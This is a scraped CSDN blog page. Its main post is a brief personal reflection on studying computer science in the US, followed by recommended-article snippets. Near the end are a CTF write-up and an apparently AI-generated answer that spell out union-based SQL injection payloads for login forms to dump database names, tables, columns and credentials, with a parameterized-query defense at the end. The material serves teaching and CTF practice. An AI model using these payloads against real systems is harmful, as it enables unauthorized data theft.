很久没上优快云,变化很大

最新推荐文章于 2026-01-04 20:56:17 发布
原创 最新推荐文章于 2026-01-04 20:56:17 发布 · 置顶 · 403 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据结构 #编程 #java

作者分享了在美国学习计算机科学的经历,从自学开始到现在系统学习Java、数据结构等课程的心路历程。

记得当时只写了两篇关于NDS编程的文章。如今回来一看,还看到,感觉很亲切~

 

都一年多没有上来了吧,变化很大,再也不是懵懂的高中学生,有自己的主见,挣脱了父母的怀抱,孤身一人独闯天下。

 

于是来到了美国。

 

这里很多学习模式等等都很不一样。很享受这里的学习模式,如果有能力就上,没能力就慢慢上。其实自己都很尽力而为的。不过还是上课上得比很多人都快。

 

现在学Java,学数据结构,学了很多棵树(教授特别喜欢树,都学了3种树了),今天还刚刚讲了图。记得以前没有老师教授帮忙,自己捧着一千多页的教材,像看天书一样。现在很欣慰,也很刻苦地学每一门计算机课。尽管考试不重要,但是也要尽力把专业课都搞好。

 

等我有空了慢慢整理一下笔记和心得和一些新的想法,慢慢贴上来。

 

只有努力,才能获得收获。

整理了很久之前在码云/Github/优快云上收藏的嵌入式产品级项目分享开源
Bruce.yang的嵌入式之旅
11-26 1483
1、MCU产品级项目收集早年活跃在优快云上的时候,我曾拥有不少积分下载了很多产品级的资源,这些年我也在这些产品级的项目上学习了很多编码技能和产品设计思维,后来加入了开源组织以后,我就飘...
从亚马逊工程师到数字游民,Upwork上年入百万的独立开发者西门
程序员陆通
01-21 1240
西门,前亚马逊(Amazon)软件工程师,现为数字游民与独立开发者,同时也是一位旅行博主。
数字的森林——各种树数据结构解析
幸福de小窝
02-10 1193
眨眼间数据结构课已经接近尾声了。Rose-Hulman这个数据结构课,从非线性数据结构开始讲起(因为线性数据结构——链表、堆栈和队列——已经在上一个面向对象设计课里面学过)讲了近10种树结构和少量的图结构。其中对所有的树更是印象深刻。下面还是总结一下这个学期学了什么。首先介绍了基本的树结构(Tree): 由此可见,树其实可以算是一个链表形式的结
优快云 原力 -- beta 测试中
热门推荐
SoftwareTeacher的专栏
03-07 91万+
优快云 希望成为开发者个人职业成长和职业成就的平台, 我们正在探讨用 “优快云 声望” 来衡量用户在我们社区的声望和技术影响力。 希望得到大家的反馈。
很久没来,创业苦并快乐着
三人行必有我师,手写三行必有所悟
10-17 909
项目刚启动,在客户这里,有点无所事事,所以上来溜达一下,csdn的博客写变化很大。 是的,又到10月份了,今年的目标还需要努力。  
谈谈我来到优快云社区的感受
全栈川川
11-03 6万+
文章目录一、你在吐槽什么?二、优快云有多少大佬入驻?1)第一位博主2)第二位博主3)第三位博主4)其它优秀博主三、其它优质内容1)每日一练2)技能树3)汉化仓库四、寄语 一、你在吐槽什么? 不可否认现在的社区不是很完善,但是我所了解的社区一直在努力完善,请给官方时间。 这些日子我在bink,还是跟一些同学谈话中,有说优快云好的,也有说优快云不好的。作为长期在这里写博客的博主,我能深刻体会大家感受,但我也看到社区在不断变好。 红包:(确实在那几天的红包让用户包括本人体验都不是很好,还好也只有那几天)
优快云前1000名博主
无知人生,记录点滴
05-26 9万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10stpeace的专栏中国本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:5286 粉丝:10660 积分:170616 等级:10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名:3 原创:162...
优快云排名(持续更新)
佛系更新
04-29 4228
本篇博客记录我的优快云排名,本博客持续更新,从第一次有排名之后开始每周记录一次,部分周因未发博客排名无明显变化没有记录本篇博客相当于记录了本博主的写作历程,新人博主可以参考我的排名以及粉丝,点赞,收藏等数据的变化历程。记录自己的排名会有一种成就感,能促使我坚持写博客。 ............
2020年最新版优快云博客排名第一名的博客
互联网老辛
07-09 1万+
文章目录前言csdn博客排名榜1. 优快云排名第一名的博主2. csdn 排名第二名的博主3. csdn排名第三名的博主4. csdn排名第四名的博主感悟总结 前言 写csdn这么久,不知道你有没有想过优快云第一名的博客到底是谁。我也一直想知道优快云排名第一的博客究竟何许人也。 研究了很久,我发现这个csdn排名第一的人每天都有变化,但始终是那几个人在前面。今天我们就来聊聊如何把csdn的排名做上去。 csdn博客排名榜 1. 优快云排名第一名的博主 博客链接: https://blog.csdn
我背着优快云偷偷记录了大半年我博客数据[手动狗头]
xindoo
09-06 4116
作为一个数据控+一个有追求的技术博主,总是希望自己能知道自己博客历史每日粉丝数量、阅读量、积分、评论……的数据,然而官方博客管理后台给展示的数据太少了,只有每日访问量、评论数、粉丝数、收藏数这几个数据,而且目前最多只能看最近一个月的数据。 如果想看更久的数据、想看自己积分的变化、想看总排名 周排名的变化…… 没有这些数据,我作为技术博主年底的年终总结怎么办?没有这些数据,我怎么知道自己长期是否进步了,进步速度又是什么样的? 这当然难不住一个优秀的程序猿,本着没有困难创造困难也要上的态度,我用Jsoup写
1024:我与优快云的相爱相杀
铁柱的博客
10-20 2420
一、前言       不知不觉相伴优快云已经三年有余,这三年时间登陆多少次优快云早已数不清楚,心情好了登上去瞧瞧,心情不好更是要登上去多看几篇好文章。这三年来,优快云见证了我的飞速成长,我也见证了优快云的巨大变化,这次借着1024有奖征文活动,咱们也只需直抒胸臆。 二、与优快云的相爱相杀 1、入目无人四下皆是你  &n...
大豆腐_csdn
08-19
但是,无论“大豆腐_csdn”具体是关于什么的,我们可以肯定的是,在IT学习的道路上,理解和掌握知识是最终的目的,而大豆腐的朴素无华正像那些基础而重要的技术知识,它们在我们的生活和工作中是不可或缺的。
复工挑战_csdn
08-19
疫情期间,很多行业都遭受了冲击,市场需求出现变化,原有的业务模式可能不再适应当前市场。因此企业需要迅速调整经营策略,创新业务模式,以适应市场的变化。 此外,复工期间企业还面临着业务搁置太久导致客户流失...
永生之梦_csdn
08-19
标题:“永生之梦_csdn”描述:“永生之梦”标签:“课件”部分内容:永生之梦黄孝光组织老化。日本东京一个诊所里的冷冻桑拿房。所谓的“冷冻桑拿”服务是将液氮转化为冷空气云,创造数分钟的零下141度的低温环境,...
数据结构 b+树
似流水般平静而坚定。
12-30 305
本文实现了一个B+树数据结构,包含完整的插入、删除、查找和范围查询功能。B+树采用M阶结构(示例中M=4),具有以下特点:1) 内部节点存储索引关键字;2) 叶子节点通过链表连接便于范围查询;3) 支持数据指针存储。核心算法包括节点分裂/合并处理上溢/下溢情况,通过递归调整保持树平衡。实现提供了详细的API接口,包括初始化、插入、删除、查找、范围查询和销毁操作,并包含调试显示功能。该实现采用C语言编写,使用动态内存管理,通过断言检查参数有效性,确保数据结构的正确性和健壮性。
【C语言】堆(Heap)的数据结构与实现:从构建到应用
qq_67169366的博客
01-04 580
结构特性:堆是一棵完全二叉树,意味着除了最后一层,其他层都是满的,且最后一层的节点都靠左排列顺序特性大根堆:父节点的值 ≥ 子节点的值小根堆:父节点的值 ≤ 子节点的值堆顶特性:堆顶元素(根节点)是整个堆中的极值元素操作时间复杂度说明插入O(log n)向上调整删除堆顶O(log n)向下调整获取堆顶O(1)直接访问建堆O(n log n)逐个插入优化建堆O(n)Floyd算法堆排序O(n log n)所有元素出堆。
十大经典排序算法详解(附C语言实现+复杂度分析)
weixin_44977283的博客
01-04 468
本文系统介绍了十大经典排序算法,包括冒泡排序、选择排序、插入排序等基础算法,以及希尔排序、快速排序、归并排序等进阶算法。详细解析了各算法的原理、C语言实现、时间/空间复杂度及稳定性特点,并提供了可直接运行的代码示例。特别对线性时间排序算法(桶排序、计数排序、基数排序)进行了深入讲解。最后总结各算法的适用场景,建议小规模数据使用基础排序,大规模数据选择快速排序或归并排序,特定场景考虑线性时间排序。所有代码均经过验证,可通过调整比较逻辑实现升序或降序排列。
数据结构——二叉树
吴声子夜歌的博客
12-29 784
如果一棵树中的每个结点有0、1或者2个孩子结点,那么这棵树就称为二叉树。空树也是一棵有效的二叉树。一棵二叉树可以看作由根结点和两棵不相交的子树(分别称为左子树和右子树)组成。如下图所示。严格二叉树:二叉树中的每个节点要么有两个孩子节点,要么没有孩子节点。满二叉树:二叉树中的每个节点恰好有两个孩子节点且所有叶子节点都在同一层。 完全二叉树:在定义完全二叉树之前,假定二叉树的高度为h。对于完全二叉树,如果将所有结点从根结点开始从左至右,从上至下,依次编号(假定根结点的编号为1),那么将得到从1~n(n为结点总数
408真题解析-2009-10-数据结构-排序
最新发布
tobias的博客
01-04 108
摘要:本文分析2009年一道排序算法选择题,题目要求根据第二趟排序结果反推所用算法。通过排除法:冒泡和选择排序会固定极值位置(不符合),二路归并排序第二趟应有4元素有序段(不符合),最终确定是插入排序(前3个元素有序)。总结各排序算法"趟"的特征:插入排序前k+1个有序,冒泡排序末尾k个有序,选择排序前k个有序,归并排序每2^k个元素有序。答案为B(插入排序)。
打开题目链接,是一个登录框,尝试弱口令登录 没什么反应 尝试万能密码登录 页面发生了变化 并未登录进去,但是有回显,大概率是SQL注入了 这里尝试了很久,尝试过程就不写了,最终判断它的注入点在用户名,而不是密码,密码随便输,而且--+的注释不行,这里要用#来注释。 成功闭合之后先判断字段数 ' or 1=1 order by 3 # AI写代码 正常回显 ' or 1=1 order by 4 # AI写代码 无回显,说明只有3列 判断回显位 ' or 1=1 union select 1,2,3 # AI写代码 在2号位 查数据库名 ' or 1=1 union select 1,database(),3 # AI写代码 数据库名为 web2 查数据库版本 ' or 1=1 union select 1,version(),3 # AI写代码 MariaDB,第一次遇见不是在mysql下的 这里说一下,因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。 尝试查询数据库名为web2下的所有表名 ' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'# AI写代码 发现该数据库下有两个表:flag,user 查询数据库名为web2下表名为flag的列名信息 ' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'# AI写代码 该表下的列名也为flag 直接查该列的具体字段信息 ' or 1=1 union select 1,flag,3 from web2.flag # AI写代码 拿到flag ctfshow{6ce6e249-b399-480c-ae37-93793eea88e2} 前面我们说过,information_schema这个数据库下面包含了所有数据库的所有信息 我们来获取一下所有数据库的数据库名 ' or 1=1 union select 1,schema_name,3 from information_schema.schemata # AI写代码 mysql数据库、web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下,这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。 ———————————————— 版权声明:本文为优快云博主「My6n」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/Myon5/article/details/133635827
12-23
<think>我们正在处理一个关于SQL注入攻击步骤的代码生成请求。根据引用内容,特别是引用[3]和[5],我们可以了解到SQL注入的基本步骤包括:判断注入点、判断字段数、判断回显位、获取数据库名、获取表名、获取列名、获取数据等。同时,引用[4]提到了使用预处理语句(如bindParam)可以防止SQL注入。 注意:生成这些代码仅用于教育目的,帮助理解SQL注入的原理和防御措施。实际攻击是非法的。 我们将按照以下步骤生成代码示例(以PHP和MySQL为例,因为引用中提到了相关技术): 1. 判断字段数:通常使用`order by`或`union select`来测试。 2. 判断回显位:在登录框中,我们通常利用联合查询(union select)来观察回显位置。 3. 查数据库名:使用`database()`函数。 4. 查数据库版本:使用`version()`函数。 5. 查指定数据库表名:从`information_schema.tables`中查询。 6. 查指定表列名:从`information_schema.columns`中查询。 7. 查指定列具体字段信息:使用`select`查询目标表。 8. 获取所有数据库名:从`information_schema.schemata`中查询。 由于登录框通常有两个字段(用户名和密码),我们假设后台查询语句为: SELECT * FROM users WHERE username = '$username' AND password = '$password' 步骤示例(假设注入点为用户名输入框): 1. 判断字段数:在用户名输入框中输入:`' or 1=1 order by 1 #`,然后尝试增加数字直到出错。 2. 判断回显位:使用联合查询,如:`' union select 1,2 #`,观察登录结果中是否显示了数字(即回显位)。 3. 查数据库名:`' union select database(),2 #`(假设回显位为1和2,且第一个位置显示数据库名)。 4. 查版本:`' union select version(),2 #`。 5. 查表名:`' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #`。 6. 查列名:`' union select group_concat(column_name),2 from information_schema.columns where table_name='users' #`(假设要查users表的列名)。 7. 查具体数据:`' union select username, password from users #`。 8. 获取所有数据库名:`' union select group_concat(schema_name),2 from information_schema.schemata #`。 但是,请注意,登录框的回显通常不像普通查询那样直接显示结果,因此攻击者可能需要利用错误信息或盲注。不过,为了演示,我们假设这里存在联合查询注入且页面会显示部分数据(例如登录后的页面会显示用户名等)。 下面我们将生成每一步的示例攻击代码(输入内容)和对应的后台SQL语句变化。注意,实际攻击中需要根据回显情况调整。 由于引用[4]提到了使用预处理可以防止注入,因此我们会在最后强调防御措施。 生成代码: </think> ### SQL注入攻击步骤及代码实现 在登录框进行SQL注入攻击时,攻击者通过构造恶意输入来探测和利用系统漏洞。以下是各步骤的具体实现方法和代码示例(基于PHP/MySQL环境): #### 1. 判断字段数 ```php // 通过ORDER BY探测字段数(二分法) username: ' or 1=1 order by 1-- password: 任意值 // 当order by 2生效但order by 3报错时,字段数为2 ' or 1=1 order by 2-- ``` #### 2. 判断回显位 ```php // 使用联合查询确定回显位置 username: ' union select 1,2-- password: 任意值 /* 返回结果示例: Login failed! 但错误消息显示:Column '2' cannot be null 说明第2个字段在页面有回显 */ ``` #### 3. 查数据库名 ```php username: ' union select 1,database()-- password: 任意值 // 成功登录后页面可能显示:欢迎用户 [当前数据库名] ``` #### 4. 查数据库版本 ```php username: ' union select 1,version()-- password: 任意值 // 返回结果示例:10.4.24-MariaDB ``` #### 5. 查指定数据库表名 ```php // 获取security数据库的所有表 username: ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- password: 任意值 /* 返回结果示例: emails,users,articles... */ ``` #### 6. 查指定表列名 ```php // 获取users表的所有列 username: ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- password: 任意值 // 返回结果示例:id,username,password,role ``` #### 7. 查指定列数据 ```php // 获取users表的用户名密码 username: ' union select 1,concat(username,':',password) from users-- password: 任意值 /* 返回结果示例: admin:482c811da5d5b4bc6d4974a1f98b5fa0 test:cab8634eac6a883e4d9b9386d4c5683b */ ``` #### 8. 获取所有数据库名 ```php username: ' union select 1,group_concat(schema_name) from information_schema.schemata-- password: 任意值 // 返回结果示例:information_schema,mysql,performance_schema,security ``` ### 防御措施 使用参数化查询可有效防止SQL注入: ```php // PDO预处理示例 $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :user AND password = :pass"); $stmt->bindParam(':user', $username); $stmt->bindParam(':pass', $password); $stmt->execute(); ``` 通过绑定参数,用户输入将被视为数据而非可执行代码[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值